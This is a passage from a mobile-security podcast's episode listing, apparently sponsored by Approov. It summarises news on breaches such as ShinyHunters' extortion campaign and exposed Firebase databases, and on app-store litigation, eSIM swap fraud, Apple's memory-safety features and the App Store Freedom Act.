    Change Credentials: Change all default credentials immediately.

    Sponsor Segment
    Securing mobile APIs from threats that target application logic and device integrity is paramount. To fortify your defenses against sophisticated adversaries like the one in the F5 breach, explore approov.io. Approov provides crucial mobile app and API protection by verifying the authenticity of mobile apps and ensuring only legitimate, untampered clients can access your APIs.

    Relevant Links
    F5 Security Advisory:
    CISA Emergency Directive:
    Sponsor Website: approov.io

    Keywords: F5, BIG-IP, API Security, Mobile App Security, Zero-Day Vulnerability, Source Code Theft, Nation-State Hacking, CISA, Emergency Directive, Zero Trust, Load Balancer, Firewall, Patching, UNC5221, BRICKSTORM, Cybersecurity, Network Topology, Credential Abuse, Upwardly Mobile

  29. 94

    Corporate Extortion and the Fall of BreachForums: Tracking ShinyHunters

    Corporate Extortion and the Fall of BreachForums: Tracking ShinyHunters

    In this episode of "Upwardly Mobile," we dive into the world of high-stakes corporate extortion, focusing on the sophisticated cybercriminal group ShinyHunters (also tracked as UNC6040) and the subsequent takedown of their infamous platform, BreachForums. The sources detail how the FBI, in collaboration with French law enforcement authorities, seized the Breachforums.hn domain, which the Scattered Lapsus$ Hunters (a gang linked to ShinyHunters, Scattered Spider, and Lapsus$) were using as a data leak and extortion site. This action involved switching the domain’s nameservers to ns1.fbi.seized.gov and ns2.fbi.seized.gov. ShinyHunters confirmed the seizure, noting that law enforcement gained access to BreachForums database backups dating back to 2023 and escrow databases since the latest reboot, effectively declaring that "the era of forums is over". Despite the clearnet site takedown, the threat actors maintained that their Tor dark web site was still accessible and that the seizure would not affect their campaign.

    The Massive Salesforce Extortion Campaign
    The core focus of the Scattered Lapsus$ Hunters’ recent activity was an extensive Salesforce extortion campaign. This campaign originated in May 2025 when ShinyHunters launched a social engineering campaign using voice phishing to trick targets into connecting a malicious app to their organization’s Salesforce portal. The hackers claimed to have stolen more than one billion records containing customer information. The long list of affected companies included major corporations such as FedEx, Disney/Hulu, Home Depot, Marriott, Google, Cisco, Toyota, Gap, McDonald's, Walgreens, and Chanel. Salesforce has publicly stated that they will not engage, negotiate with, or pay any extortion demand.

    Beyond Salesforce: Discord and Red Hat
    The criminal group also claimed responsibility for other significant intrusions:
    Red Hat Data Theft: The Scattered Lapsus$ Hunters took credit for compromising a Red Hat GitLab server, stealing more than 28,000 Git code repositories and sensitive internal documents, including customer secrets and infrastructure details.
    Discord Breach: ShinyHunters claimed responsibility for an incident affecting Discord users. Discord confirmed that an unauthorized party compromised a third-party customer service provider (5CA), impacting a limited number of users who had contacted Customer Support or Trust & Safety teams. Critically, the unauthorized party gained access to a small number of government-ID images submitted for age verification appeals, as well as usernames, emails, limited billing info, and IP addresses.

    Tactics and Targets
    The group employs sophisticated tactics, including exploiting zero-day vulnerabilities, such as a critical flaw in Oracle’s E-Business Suite software (CVE-2025-61882). Furthermore, members of the group have been known to distribute malware—specifically the commercially available ASYNCRAT backdoor—disguised as a Windows screensaver file (.scr) via menacing, targeted emails. This highlights the constant pressure faced by security professionals, often from threat actors derisively called "Advanced Persistent Teenagers" (APTs).

    Links & Resources
    Law Enforcement Takedown: Nameservers used in the FBI seizure: ns1.fbi.seized.gov and ns2.fbi.seized.gov.
    Publications Cited: Information confirmed by BleepingComputer and reported by KrebsOnSecurity.
    Discord Security Incident: Discord confirmed they would contact impacted users via [email protected]
    Security Validation: Join the Picus BAS Summit to experience the future of security validation.
    ASYNCRAT Analysis: VirusTotal analysis on the ASYNCRAT malware provided via link.

    🛡️ Sponsor: approov.io
    To ensure your mobile and web applications are secure against sophisticated attacks, trust the experts. Learn more about enhanced security measures and API protection at approov.io.

    Keywords: ShinyHunters, BreachForums, Salesforce Extortion, FBI Takedown, Scattered Lapsus$ Hunters, Data Breach, Red Hat, Discord Hack, Voice Phishing, Cybercrime, Hacking Forum, ASYNCRAT, UNC6040, CVE-2025-61882, Security Validation.

  30. 93

    Next Generation Attestation to Secure Mobile Apps Against Threats from AI

    Mobile is officially the digital default. In this episode of Upwardly Mobile, we explore the staggering statistics showing mobile devices dominating global internet usage and discuss the critical security challenges that arise from this mobile-first environment. We then delve into the cutting-edge solution offered by our sponsor, Approov, and their latest platform update, Approov 3.5, designed to secure brands against evolving threats, including AI-driven attacks and new regulatory pressures.

    The Mobile Tipping Point: 64% and Rising
    The mobile landscape is at an inflection point. As of 2025, over 64% of all website traffic comes from mobile devices. This dominance is driven by the fact that nearly 96.3% of internet users access the internet using a mobile phone.
    • This shift is not just a trend; it is the new normal.
    • Mobile traffic reached 64.1% in Q2 2025, marking eight consecutive quarters of growth.
    • Developing regions are leading the surge, with Africa having the highest proportion of mobile internet traffic at 69.13%, and Asia seeing 72.3% of all web traffic coming from smartphones.
    • The most common activities performed on smartphones include playing a game (68%), listening to music (67%), and using social media (63%).

    The Security Gap in a Mobile-First World
    The widespread adoption of mobile creates significant security vulnerabilities. Automated threats make it easier for bad actors to clone legitimate apps, steal data, and commit fraud, which can cause irreparable damage to a brand's reputation and financially devastate users. Furthermore, new security gaps are emerging due to regulations like the EU’s Digital Markets Act (DMA), which mandates support for third-party app stores, increasing the risk of fraudulent apps.

    Approov 3.5: Protecting the Critical Connection
    Approov, the leader in mobile API security, addresses these threats by acting as a digital gatekeeper. Approov protects the critical connection between a mobile app and a company's backend servers (APIs). It ensures that only genuine, untampered apps running in a secure environment can access sensitive services, blocking automated bots, modified apps, and cloned apps before they can compromise data.
    The latest platform update, Approov 3.5, delivers next-generation attestation:
    • Ready for the DMA and Open App Stores: Approov’s cloud-based verification ensures only genuine app instances—regardless of their distribution source—can access a company’s APIs.
    • Hardware-Backed Security (Android): Cryptographic keys are stored in a secure, isolated “vault” on the device’s hardware, making cloning an app’s identity virtually impossible.
    • Defense Against AI-Powered Attacks: The platform provides real-time threat analytics, allowing security teams to dynamically issue over-the-air (OTA) updates to block emerging AI threats without requiring an app update.
    • Immutable App Signature: This feature creates a unique fingerprint upon installation, continuously verifying the app’s integrity against tampering or repackaging with malware.
    • Memory Dump Detection: A new defense actively blocks attackers attempting to scrape sensitive information, such as AI secrets or user credentials, directly from the device’s memory.
    Approov has proven that robust security can be achieved without compromising user experience, offering fast and responsive cross-platform security checks for iOS, Android, and HarmonyOS. By verifying API requests, Approov reduces API attacks by over 95%.

    --------------------------------------------------------------------------------
    Keywords: Mobile traffic, API security, Approov 3.5, mobile app security, Digital Markets Act (DMA), hardware-backed security, 64% web traffic, AI-powered attacks, mobile-first, app cloning, fraud prevention, mobile API.
    Sponsor Link: For more information on securing your mobile application and APIs, please visit our sponsor: www.approov.io.

  31. 92

    Big Tech's Gamble: Lawsuits Challenge Apple, Google, and Meta Over Social Casino Apps

    In this episode of Upwardly Mobile, we dive into the significant legal challenges facing major technology companies—Apple, Google (Alphabet), and Meta Platforms—as they are forced to defend themselves against class action lawsuits alleging that they promoted and profited from illegal social casino gambling apps. A recent ruling by U.S. District Judge Edward Davila in San Jose, California, denied the companies' requests to dismiss the lawsuits. The plaintiffs, numbering in the dozens, contend that the companies' platforms—Apple’s App Store, Google’s Play Store, and Meta’s Facebook—promoted an “authentic Vegas-style experience of slot machine gambling” through an allegedly illegal racketeering conspiracy.

    Key Takeaways from the Litigation:
    The Liability Claim: The core claim is that the defendants "willingly assist, promote and profit from" allegedly illegal gambling. This is achieved by:
      Offering users access to the apps through their stores.
      Taking a substantial percentage of consumer purchases (estimated at 30% commission, totaling over $2 billion) on in-app transactions for items like Game Coins and Sweeps Coins.
      Processing these allegedly illicit transactions using proprietary payment systems.
      Using targeted advertising to "shepherd the most vulnerable customers" to the casino apps.
    The Section 230 Defense Rejected: Apple, Google, and Meta argued that Section 230 of the federal Communications Decency Act protected them from liability because this law shields online platforms from lawsuits over third-party content. Judge Davila rejected this argument, finding that the companies did not act as "publishers" when processing payments. The judge emphasized that the "crux of plaintiffs’ theory is that defendants improperly processed payments for social casino apps".
    "Neutral Tools" Argument Undercut: The court called it irrelevant that the companies provided "neutral tools" (like payment processing) to support the apps.
    Damages Sought: The lawsuits seek unspecified compensatory and triple damages, among other remedies.
    Appeals and Case History: Judge Davila allowed the defendants to immediately appeal his decision to the 9th U.S. Circuit Court of Appeals, acknowledging the importance of the Section 230 issues. The litigation against the Silicon Valley-based companies began in 2021.
    Additional Suits: Separately, a new lawsuit was filed against Apple and Google by lead Plaintiff Bargo (not naming the social casino operators), alleging the distribution of "patently illegal gambling software" in New Jersey and New York. This complaint includes legal claims under NJ and NY gambling loss recovery statutes, consumer protection laws, and RICO laws.

    Sponsor Message: This episode of Upwardly Mobile is brought to you by our sponsor. Learn how to secure your mobile app business today. Visit approov.io.

    Relevant Source Materials & Case Information:
    Article Reference (Legal Analysis): Excerpts from "Apple and Google Hit with New Social Casino Gambling Lawsuit," National Law Review (October 02, 2025). (Article written by James G. Gatto of Sheppard, Mullin, Richter & Hampton LLP).
    Article Reference (News): "Apple, Google, Meta must face lawsuits over gambling apps," Honolulu Star-Advertiser (Oct. 1, 2025).
    Article Reference (Judicial Denial): "Judicial Denial for Tech Giants in Casino App Lawsuits" (Sept 30).
    Amicus Brief Reference: In re: Casino-Style Games Litigation (Nos. 22-16914, 22-16916, 22-16888, 22-16889, 22-16921, 22-16923), U.S. Court of Appeals for the Ninth Circuit.
    District Court Case Reference (Northern District of California): In re Apple Inc App Store Simulated Casino-Style Games Litigation, No. 21-md-02985; In re Google Play Store Simulated Casino-Style Games Litigation, No. 21-md-03001; and In re Facebook Simulated Casino-Style Games Litigation, No. 21-02777.
    Sponsor Link: approov.io

    Keywords for SEO Optimization: Social Casino Lawsuit, Apple, Google, Meta, Section 230, Gambling Apps, App Store, Play Store, Communications Decency Act, Platform Liability, Edward Davila, Consumer Protection, Racketeering, Illegal Gambling, Tech Litigation, In-App Purchases, RICO.

  32. 91

    How Misconfigured Firebase Servers Exposed User Credentials and Private Data?

    In this critical episode of Upwardly Mobile, we delve into the alarming cybersecurity incident involving massive data exposure stemming from misconfigured Firebase servers. Cybersecurity researchers uncovered a breach that exposed the sensitive information and plaintext passwords of over 1.8 million users. This wasn't the result of sophisticated hacking, but rather "basic negligence" and developers failing to implement standard security settings.
    We discuss why Firebase, Google's popular backend-as-a-service (BaaS) for mobile apps, has become a liability risk when developers neglect configuration best practices.

    What was exposed and the devastating scope of the leak:
    The scope of this data leak is massive, involving publicly accessible Firebase real-time databases used by more than 900 mobile applications, predominantly Android-based. These affected apps spanned categories including health, fitness, education, and finance.
    The highly sensitive user data exposed included:
    • Plaintext passwords (unencrypted)
    • Usernames, email addresses, and phone numbers
    • Billing information
    • High-privilege API tokens, AWS root access tokens, and private chat logs
    • Millions of user ID photos.

    The Failure of Security as an Afterthought:
    Experts warn that storing plaintext passwords on open cloud databases in 2025 is "reckless". The breach occurred because developers failed to secure their Firebase instances, often by extending insecure "test-mode" configurations or inadvertently leaving production environments vulnerable. Responsibility for this preventable disaster lies with both the developers and Firebase itself, for allowing insecure default settings.
    We also explore the technical mechanism behind these breaches: automated scanning tools (like OpenFirebase) are actively exploiting this vulnerability by parsing Android Package Kit (APK) files to extract Firebase project IDs and API keys, and subsequently probing service URLs for unauthenticated access.
    This incident serves as a strong wake-up call for the tech industry, emphasizing the critical need for mandatory security training and treating security as a core function of software development—not an afterthought.

    --------------------------------------------------------------------------------
    🛡️ Sponsor: Approov
    Protect your mobile APIs and prevent automated attacks that exploit hardcoded secrets and misconfigurations. Secure your apps from the client-side up. Learn more and protect your platform at https://approov.io.
    --------------------------------------------------------------------------------
    Source Materials & Links
    • Article 1: "Massive data leak exposes passwords of 1.8 million users through misconfigured Firebase servers," ZENDATA (May 25, 2025).
    • Article 2: "Numerous Applications Using Google's Firebase Platform Leaking Highly Sensitive Data," Cyber Security News (September 25, 2025).
    --------------------------------------------------------------------------------
    Keywords: Data Leak, Firebase Security, Plaintext Passwords, Cybersecurity, Mobile App Security, Google Firebase, Cloud Misconfiguration, Data Breach, Developer Negligence, API Security, Android Security, BaaS, App Development.

  33. 90

    Neon's Data Disaster: How a Viral AI App Exposed 75,000 Users and Went Dark

    Neon's Data Disaster: How a Viral AI App Exposed 75,000 Users and Went Dark

    In this urgent episode of Upwardly Mobile, we break down the spectacular rise and immediate fall of the highly controversial mobile application, Neon. The app, which recently topped the charts and went viral on platforms like TikTok, promised users payment in exchange for recording their phone calls. These recordings were then sold to AI companies for training. However, less than 24 hours after gaining widespread attention, a significant security flaw was discovered. According to reports from TechCrunch, this flaw allowed public access to extremely sensitive user data.

    The Security Catastrophe
    The call-recording app had rapidly climbed the App Store ranks, reporting 75,000 downloads in a single day. Despite its rapid growth, Neon was forced offline after the security issue was discovered by TechCrunch. The flaw was so severe that it allowed anyone utilizing a network analysis tool to access private information belonging to other users. Exposed data included:
    • Users' phone numbers.
    • Call recordings and accessible URLs to the raw audio files.
    • Text transcripts of the recorded calls.
    • Detailed metadata connected to the calls, including the phone number of the person called, the time and duration of the call, and the amount earned from the call.

    The Company Response
    Following the discovery, Neon founder Alex Kiam sent an email to customers notifying them of the app's temporary shutdown. Kiam stated that they were taking the app down to "add extra layers of security" because "Your data privacy is our number one priority". However, it is crucial to note that the email failed to warn users about the specific security issue or that their phone numbers, call recordings, and transcripts had been exposed. TechCrunch noted that although the app's servers were taken down, rendering the app useless, it remained available in the App Store. If Neon does make a comeback, it will certainly receive increased scrutiny regarding its security protocols.

    Secure Your Mobile Infrastructure with Our Sponsor
    In a world where mobile app security flaws can rapidly expose millions of data points, protecting your back-end servers and APIs is non-negotiable. Our episode today highlights the critical importance of mobile app protection from the get-go. Learn how to implement proactive mobile security measures. Visit: approov.io

    Relevant Source Materials & Further Reading
    Excerpts from "Neon, the viral app that pays users to record calls, goes offline after exposing data | Mashable"
    Excerpts from "Viral call-recording app Neon goes dark after exposing users' phone numbers, call recordings, and transcripts | TechCrunch"

    Keywords: Neon app security flaw, AI training data, call recording app, data privacy, cybersecurity, mobile app data exposure, Alex Kiam, App Store security, TechCrunch exclusive, data breach, viral app failure, mobile security.

  34. 89

    Google's Legal Gauntlet: Antitrust Battles and the Future of the App Ecosystem

    Google's Legal Gauntlet: Antitrust Battles and the Future of the App Ecosystem

    This week on Upwardly Mobile, we dissect the flurry of major legal decisions facing Google in September 2025, from its desperate plea to the Supreme Court to halt the Epic Games injunction to the final ruling in the federal search monopoly case. We explore the massive shifts coming to the Android app ecosystem and Google's mandated business practice changes.

    Episode Notes
    September 2025: A Critical Month for Google's Antitrust Defense
    Google is challenging two massive antitrust rulings simultaneously, initiating what the sources describe as its "last hope" to maintain control over core business functions.

    Part 1: The Epic Games Showdown at the Supreme Court
    Google has asked the U.S. Supreme Court to intervene and pause the injunction it received following a major legal loss to Epic Games in October 2024. The company is seeking a decision on the stay by October 17, just days before the injunction is scheduled to take effect around October 20 or 22. The injunction, upheld by the Ninth Circuit Court of Appeals, requires Google to make several fundamental changes to the Google Play Store and the Android app ecosystem:
    Open the Play Store: Google must allow users to download and use third-party app stores for a period of three years.
    External Billing: Google is no longer allowed to force developers to use its billing system; developers must be allowed to include external links in apps, enabling users to bypass Google’s billing system.
    End Pre-Install Deals: Google can no longer make deals around pre-installing the Play Store on phones.
    Google argues that this "unprecedented antitrust injunction" will "[create] enormous security and safety risks" by allowing the proliferation of stores that stock "malicious, deceptive or pirated content". Furthermore, Google claims the injunction burdens developers with constantly monitoring numerous stores and makes it substantially easier for developers to avoid compensating Google for services. Epic Games strongly disagrees, stating that Google continues to rely on "flawed security claims" rejected by the jury and the Ninth Circuit. Epic maintains that the injunction should go into effect so consumers and developers can benefit from competition, choices, and lower prices.

    Part 2: The Search Monopoly Ruling
    In a separate, long-running federal monopoly case, U.S. District Judge Amit Mehta ruled on remedies following his earlier decision that Google had acted illegally to maintain a monopoly in internet search. Key aspects of Judge Mehta's September 2025 ruling include:
    No Divestiture of Chrome/Android: The judge denied the Department of Justice's proposal to force Google to sell its Chrome browser or divest the Android operating system, ruling that the government had "overreached".
    End Exclusive Deals: Google is no longer permitted to strike exclusive deals around the distribution of search, Google Assistant, Gemini, or Chrome. For example, Google cannot require device makers to pre-load its apps in order to gain access to the Play Store.
    Data Sharing: Google must share some of its search data with competitors going forward to narrow the "scale gap" created by exclusive distribution agreements. (Google is not required to share data related to its ads.)
    Google called the decision "largely a win" but expressed concerns about the requirements to share Search data and the new limits imposed on how Google distributes its services.

    🛡️ Sponsored by Approov
    As discussions around third-party app stores and sideloading intensify due to the Epic v. Google injunction, the need for robust mobile app security is paramount. Approov provides essential security solutions for developers navigating these new challenges. Approov offers mobile app attestation solutions that allow developers to safely distribute mobile apps through third-party app stores by significantly mitigating the primary risks associated with sideloading, such as malware, app tampering, and fraudulent API use. Approov verifies both the integrity of the app and the device environment, ensuring that only genuine, unmodified app instances—regardless of installation source—can communicate with backend APIs. Approov's system works across Android, iOS, and HarmonyOS. Learn how Approov secures your APIs and mobile apps against evolving threats related to sideloading and third-party distribution: [approov.io]

    Relevant Links (Source Material)
    Epic Games Lawsuit: Coverage regarding Google’s request for a Supreme Court stay and the opening of the Play Store (as reported by Engadget, Thurrott.com, The Verge, and Reuters).
    DOJ Monopoly Case: Reporting on Judge Amit Mehta’s final ruling, which denied the divestiture of Chrome but mandated changes to Google’s search distribution and data sharing practices (as reported by Engadget).
    Security Solutions: Information on mobile app attestation and security best practices for apps distributed through third-party channels.

    Keywords: Google Supreme Court, Epic Games, Antitrust, Google Play Store, Android Ecosystem, Third-Party App Stores, App Store Security, Chrome Monopoly, Judge Amit Mehta, DOJ Lawsuit, App Distribution, Mobile App Attestation, Approov, Digital Marketplace, Competition Law.

  35. 88

    How Secure Are eSIMs? Exploring Myths and the Reality of Digital SIM Cards

    Episode Notes

    Description: In this episode of Upwardly Mobile, we dive into one of the most pressing cybersecurity threats facing mobile carriers and their subscribers: eSIM swap fraud. While digital SIMs offer superior security against physical theft, they remain vulnerable to sophisticated credential-based attacks and social engineering that target the carrier's systems. We explain how this critical fraud operates and reveal the advanced, cloud-based technologies—App Attestation and Device Binding—that mobile operators are now deploying to verify user identity and device integrity in real time, effectively blocking fraudsters before a swap can be completed.

    The eSIM Swap Threat
    eSIM swapping is a form of identity fraud where an attacker convinces a mobile carrier to transfer a victim's phone number to a new eSIM under the attacker's control, often by impersonating the legitimate user remotely.
    • Attack Method: Attackers often gather personal details from public sources or breaches, then contact the carrier, claiming they need to transfer their number to a new device. Since no physical access is needed, the fraud relies entirely on weaknesses in the carrier's authentication process.
    • The Impact: Once a swap is successful, the criminal gains full control over the victim's phone number. They can intercept calls, texts, and, critically, one-time security codes (OTPs) sent via SMS, allowing them to bypass two-factor authentication (2FA) for online banking, cryptocurrency exchanges, and other sensitive accounts, leading to massive financial loss.

    The Technical Solution: Attestation and Binding
    To counter these remote, identity-based attacks, carriers are adopting a multi-layered verification approach focused on establishing the trustworthiness of the application and the hardware initiating the swap request.

    1. App Attestation
    This technology focuses on verifying the integrity and legitimacy of the carrier's mobile application.
    • Verification: App Attestation confirms that the carrier's app being used is the genuine, untampered version downloaded directly from an official app store.
    • Prevention: It detects if the app has been modified with malicious code or is running in a compromised environment, such as an emulator. If an attacker attempts to use a fake or compromised version of the carrier's app to initiate a fraudulent eSIM swap request, app attestation detects and blocks that request.

    2. Device Binding
    Device Binding provides a cryptographic link between a user's account and the unique hardware characteristics of their trusted device.
    • Secure Link: When a user first logs in, a secure link is created between the app and the device's hardware IDs.
    • Suspicion Flagging: If a request for an eSIM swap is later initiated from a different, unverified device, the system flags the activity as suspicious, regardless of whether the attacker has stolen credentials. The system can then require additional verification steps or outright deny the unauthorized transfer.
    This combined approach shifts the security decision-making from the potentially compromised user device to a secure cloud service, making it extremely difficult for attackers to bypass checks through client-side tampering or reverse-engineering.

    Comprehensive Security Layers for Mobile Carriers
    Beyond app and device verification, mobile carriers are advised to strengthen defenses through systemic controls:
    • Stricter Authentication: Implementing secure authentication processes for eSIM transfers, including demanding extra layers like verbal confirmation or a photo ID.
    • Device Fingerprinting: Binding eSIM profiles to unique device hardware IDs to prevent unauthorized cloning or reuse across multiple devices.
    • Advanced Analytics: Leveraging AI-Driven Fraud Detection and machine learning to monitor network activity for anomalies, such as unusual call volumes or multiple simultaneous activations, which might signal digital SIM Box fraud schemes.
    • User Protection Features: Offering tools like Verizon's "SIM Protection," which allows customers to lock lines on their account, prohibiting any transaction requiring a new SIM/eSIM transfer until manually unlocked (with a possible 15-minute delay when unlocking).

    Protect Yourself: User Best Practices
    Users must also adopt strong security habits to minimize risk:
    • Prioritize App-Based 2FA: Always use authenticators like Google Authenticator or Authy over SMS-based two-factor authentication (2FA) for critical accounts, as SMS codes can be intercepted post-swap.
    • Secure Your Carrier Account: Set a strong password and add an account PIN or passcode with your carrier to prevent unauthorized changes.
    • Stay Vigilant: Immediately contact your carrier if you notice unexpected loss of cellular service, unusual account alerts, or unauthorized charges, which are common signs of a successful eSIM hack.

    Sponsor
    This episode is brought to you by Approov, pioneers in Mobile App and Device Security. Learn how Approov's App Attestation and Device Binding solutions safeguard your mobile transactions and prevent sophisticated fraud.
    Visit: approov.io

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast
    This episode includes AI-generated content.

  36. 87

    Apple's Leap in iOS Security: Unpacking Memory Integrity Enforcement (MIE)

    In this episode, we're diving deep into Apple's groundbreaking Memory Integrity Enforcement (MIE), an unprecedented effort poised to redefine the landscape of mobile security, and we'll also explore the broader spectrum of threats targeting the iOS ecosystem.

    Apple's Memory Integrity Enforcement (MIE) is the culmination of a half-decade of intensive design and engineering, combining the unique strengths of Apple silicon hardware with advanced operating system security. Apple believes MIE represents the most significant upgrade to memory safety in the history of consumer operating systems. This comprehensive, always-on protection is designed to provide industry-first memory safety across Apple devices, all without compromising device performance.

    The Driving Force: Combating Mercenary Spyware
    While the iPhone has never experienced a successful, widespread malware attack, Apple's focus for MIE is primarily on the mercenary spyware and surveillance industry. These highly sophisticated threats, often associated with state actors, utilize exploit chains that can cost millions of dollars to target a small number of specific individuals. A common denominator in these advanced attacks, whether targeting iOS, Windows, or Android, is their reliance on memory safety vulnerabilities. MIE aims to disrupt these highly effective exploitation techniques that have been prevalent for the last 25 years.

    How MIE Works: A Three-Pronged Defense
    MIE is built on a robust foundation of hardware and software innovations:
    1. Secure Memory Allocators: Apple's efforts in memory safety include developing with safe languages like Swift and deploying mitigations at scale. Key to MIE are its secure memory allocators, such as kalloc_type (introduced in iOS 15 for the kernel) and xzone malloc (for user-level in iOS 17), alongside WebKit's libpas. These allocators use type information to organize memory, thwarting attackers' goals of creating overlapping interpretations of memory to exploit use-after-free and out-of-bounds bugs.
    2. Enhanced Memory Tagging Extension (EMTE): Building on Arm's 2019 Memory Tagging Extension (MTE) specification, Apple conducted deep evaluations and collaborated with Arm to address weaknesses, leading to the Enhanced Memory Tagging Extension (EMTE) specification in 2022. MIE rigorously implements EMTE in strictly synchronous, always-on mode, a crucial factor for real-time defensive measures in adversarial contexts. EMTE prevents common memory corruption types:
        ◦ Buffer Overflows: The allocator tags neighboring allocations with different secrets. If memory access spills over into an adjacent allocation with a different tag, the hardware blocks it, and the operating system can terminate the process.
        ◦ Use-After-Free Vulnerabilities: Memory is retagged when reused. If a request uses an older, invalid tag for retagged memory, the hardware blocks it. EMTE also specifies that accessing non-tagged memory from a tagged region requires knowing that region's tag, making it harder for attackers to bypass EMTE.
    3. Tag Confidentiality Enforcement: This critical component protects the implementation of Apple's secure allocators and the confidentiality of EMTE tags, even against side-channel and speculative-execution attacks. Apple's silicon implementation prevents tag values from influencing speculative execution, a vulnerability seen in other MTE implementations. Furthermore, MIE addresses Spectre variant 1 (V1), a speculative-execution vulnerability, with a mitigation designed for virtually zero CPU cost, making it impractical for attackers to leak tag values and guide attacks.

    Impact and Availability
    Memory Integrity Enforcement is built right into Apple hardware and software in all iPhone 17 and iPhone Air models, offering unparalleled, always-on memory safety protection for key attack surfaces, including the kernel and over 70 userland processes. Importantly, MIE was designed to deliver groundbreaking security with minimal performance impact, remaining completely invisible to users. Apple is also making EMTE available to all developers in Xcode as part of the new Enhanced Security feature. Extensive evaluations by Apple's offensive research team have confirmed that MIE dramatically reduces the exploitation strategies available to attackers, making it extremely difficult to rebuild exploit chains.

    Beyond MIE: Other Threats to iOS Devices
    While MIE targets memory corruption, the iOS ecosystem faces a range of other threats:
    • Application-Level Threats: These include various forms of malware, such as TouchID malware, Yispecter, and AceDeceiver, which exploit design flaws or trick users. More widespread are leaky applications (greyware), representing 61% of iOS apps, which legally collect and silently forward unnecessary personal data like location, contacts, and photos to third parties.
    • Network-Level Threats: iOS devices are as exposed to network-related threats as any other operating system. These include Man-In-The-Middle (MITM) attacks, where communications are intercepted or altered via unprotected WiFi hotspots or spoofing. Phishing and Smishing are the most detected network threats on mobile devices, trapping users through malicious links in emails or SMS. Rogue cell towers can also trick devices into connecting, allowing interception of calls, SMS, and data.
    • Device-Level Threats: OS vulnerability exploits occur when cybercriminals leverage public security holes in outdated iOS versions (e.g., Pegasus spyware). Jailbroken devices bypass iOS security checks, making them more vulnerable to malicious applications. Finally, unmanaged or malicious profiles can be configured to send all transiting data to external servers, crushing data privacy.
    Organizations like Pradeo offer solutions such as Mobile Threat Defense (MTD) and Mobile Application Security Testing to provide full protection for mobile fleets and applications, safeguarding data and ensuring compliance with data privacy regulations.

    Relevant Links to Source Materials:
    • For deeper insights into Apple's Memory Integrity Enforcement, refer to the "Memory Integrity Enforcement: A complete vision for memory safety in Apple devices" research by Apple Security Engineering and Architecture (SEAR).
    • To understand broader iOS threats, consult the "iOS SECURITY REPORT: THREATS TARGETING APPLE MOBILE DEVICES" white paper by Pradeo.

    Sponsored by: Enhance your mobile API security with Approov. Visit them at approov.io.

    Keywords: Apple security, Memory Integrity Enforcement (MIE), iOS security, memory safety, mercenary spyware, EMTE, secure allocators, buffer overflows, use-after-free, speculative execution, cyber threats, mobile security, iPhone security, hardware security, software security, enterprise mobility, mobile malware, leaky applications, Man-In-The-Middle, phishing, jailbreaking, OS vulnerabilities, Pradeo Security, API security, mobile API protection, device integrity.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast
    This episode includes AI-generated content.

  37. 86

    What the App Store Freedom Act Means for Developers and Consumers?

    The App Store Freedom Act

    Episode Description: In this episode of Upwardly Mobile, we unpack the App Store Freedom Act, a landmark bipartisan bill aiming to reform the highly concentrated mobile app marketplace dominated by tech giants like Apple and Google. Introduced by Representative Kat Cammack (R-FL) and co-sponsored by Representative Lori Trahan (D-MA), this legislation addresses significant concerns about anti-competitive practices, consumer choice, and developer freedom.

    The Coalition for App Fairness (CAF), an independent nonprofit advocating for consumer choice and a level playing field for app developers, applauds the bill's bipartisan support, seeing it as a crucial step to dismantle "mobile walled gardens". We explore the bill's key provisions, which include allowing users to choose third-party app stores, install apps outside of official stores, and delete pre-installed applications. The Act also seeks to remove limitations on communication between developers and users, cap commissions on payments outside default systems, and mandate data sharing for app developers.

    However, the App Store Freedom Act isn't without its critics. We delve into the concerns raised by the American Action Forum, particularly regarding potential overlaps with existing antitrust law and recent rulings like Apple v. Epic Games. A major point of contention is the security implications: opening up app stores could lead to a significant influx of fraudulent apps, data theft, and unverified third-party providers, potentially compromising the "walled garden" security benefits that currently protect users. We also discuss how, while the bill might expedite FTC enforcement, it could bypass crucial antitrust requirements, potentially overlooking pro-consumer behaviors by app store providers. Join us as we explore the multifaceted debate surrounding this pivotal piece of tech legislation.

    Key Discussion Points:
    • The Problem: Anti-competitive practices and lack of consumer freedom in mobile app stores controlled by Apple and Google.
    • The Bill's Purpose: To foster competition, enhance consumer choice, and create a level playing field for app developers globally.
    • Core Provisions of the App Store Freedom Act (H.R.3209):
        ◦ Interoperability: Users can choose default third-party app stores, install apps from outside sources, and hide/delete pre-installed apps.
        ◦ Open App Development: Requires covered companies to provide developers with access to interfaces, hardware, and software features on equivalent terms.
        ◦ Prohibitions: Bans requirements for specific in-app payment systems, prevents punitive actions against developers using alternative pricing or payment methods, and protects legitimate business communications between developers and users.
        ◦ Nonpublic Business Information: Prohibits covered companies from using developer data to compete against those apps.
    • Enforcement: Violations are treated as unfair or deceptive acts by the Federal Trade Commission (FTC), with potential civil penalties up to $1,000,000 per violation. State attorneys general can also bring civil actions.
    • Overlap with Existing Law & Apple v. Epic Games: Discussion on whether new legislation is fully necessary given previous court rulings that addressed similar anti-steering practices.
    • Security Concerns: Analysis of how opening the "walled garden" could impact user safety, potentially leading to fraudulent apps, stolen data, and unverified third-party providers.
    • Balancing Act: The trade-offs between promoting competition and maintaining user security and convenience.

    Relevant Source Materials for this Summary:
    • "CAF Applauds Bipartisan Support for App Store Freedom Act - Coalition for App Fairness"
    • "Evaluating the App Store Freedom Act - AAF"
    • "Text - H.R.3209 - 119th Congress (2025-2026): App Store Freedom Act | Congress.gov | Library of Congress"

    Sponsor: This episode of Upwardly Mobile is brought to you by Approov.io. Secure your APIs and mobile apps against fraud and abuse. Visit approov.io to learn more.

    Keywords: App Store Freedom Act, digital markets, app store regulation, Apple, Google, anti-competitive practices, consumer choice, app developers, mobile apps, Open App Markets Act, Apple v. Epic Games, FTC, security concerns, H.R.3209, mobile walled gardens, competition policy, tech legislation, digital monopoly, software development, consumer protection, privacy.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast
    This episode includes AI-generated content.

  38. 85

    Anatsa Unleashed | Android Banking Trojan Targets Over 830 Financial Apps Globally

    Episode Title: Anatsa Unleashed: How a Sophisticated Android Banking Trojan Targets Over 830 Financial Apps Globally

